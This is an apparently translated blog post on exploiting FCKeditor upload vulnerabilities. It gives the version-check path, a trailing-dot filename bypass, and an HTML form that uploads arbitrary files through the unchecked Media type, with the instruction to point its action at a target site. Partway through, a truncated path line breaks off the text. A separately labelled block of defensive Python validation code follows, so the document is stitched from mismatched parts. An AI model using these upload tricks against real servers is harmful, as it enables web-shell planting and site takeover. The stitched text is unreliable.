/includes/fckeditor/editor/filemanager/connectors/php/upload.php

淡淡的烟草味﹌ 2023-09-24 12:58

## A roundup of finding and exploiting common FCKeditor vulnerabilities; the FCKeditor file upload vulnerability and its exploitation. /includes/fckeditor/editor/filemanager/connectors/php/upload.php ##

1. Check the editor version number: `FCKeditor/_whatsnew.html`

2. Version 2.2: on Apache + Linux, adding a `.` after the uploaded file bypasses the restriction. Tested and confirmed.

3. Version <= 2.4.2 for PHP: the code that handles PHP uploads applies no file-type control to the Media type, which lets a user upload arbitrary files. Save the following as an HTML file and change the action address.

```html
<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
  Upload a new file:<br>
  <input type="file" name="NewFile" size="50"><br>
  <input id="btnUpload" type="submit" value="Upload">
</form>
```

/includes/fckeditor/editor/filem
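A server-side check that closes both gaps described in items 2 and 3 (the trailing `.` and the unchecked `Media` type), as an added example that is not FCKeditor's code or part of the original post. The function name `check_upload` and the extension lists are assumptions, and rejecting an executable extension in any position goes slightly beyond the two cases on the page.

```python
# Added example: upload validation with an allow-list for every resource type.
# The extension lists below are assumptions, not FCKeditor's shipped config.
ALLOWED = {
    "File": {"pdf", "doc", "docx", "txt", "zip"},
    "Image": {"jpg", "jpeg", "png", "gif"},
    "Flash": {"swf"},
    "Media": {"mp3", "mp4", "avi", "wmv", "mpg"},  # Media is restricted too
}
# Extensions a web server may hand to an interpreter.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "asp", "aspx",
              "jsp", "cgi", "pl"}


def check_upload(resource_type, filename):
    """Return (allowed, reason, stored_name) for one upload request."""
    allowed_exts = ALLOWED.get(resource_type)
    if allowed_exts is None:
        # Deny by default: a type without an allow-list is never unrestricted.
        return False, "unknown resource type", None
    # Keep only the base name, whichever path separator the client sent.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Drop trailing dots and spaces before reading the extension, so
    # "x.php." is judged (and stored) as "x.php".
    name = name.rstrip(". ")
    if not name or name.startswith(".") or "\x00" in name:
        return False, "invalid file name", None
    segments = name.lower().split(".")
    if len(segments) < 2:
        return False, "missing extension", None
    # Reject an executable extension in any position, not only the last one.
    if any(seg in EXECUTABLE for seg in segments[1:]):
        return False, "executable extension", None
    if segments[-1] not in allowed_exts:
        return False, "extension not allowed for type " + resource_type, None
    return True, "ok", name


if __name__ == "__main__":
    # Constructed sample requests: (resource type, client-supplied file name).
    for sample in [("Media", "shell.php"), ("Image", "shell.php."),
                   ("Media", "clip.mp4"), ("Image", "photo.jpg."),
                   ("Other", "notes.txt")]:
        print(sample, "->", check_upload(*sample))
```

Storing uploads outside the web root, or in a directory where the server executes nothing, backs this check up if the allow-list is ever misconfigured.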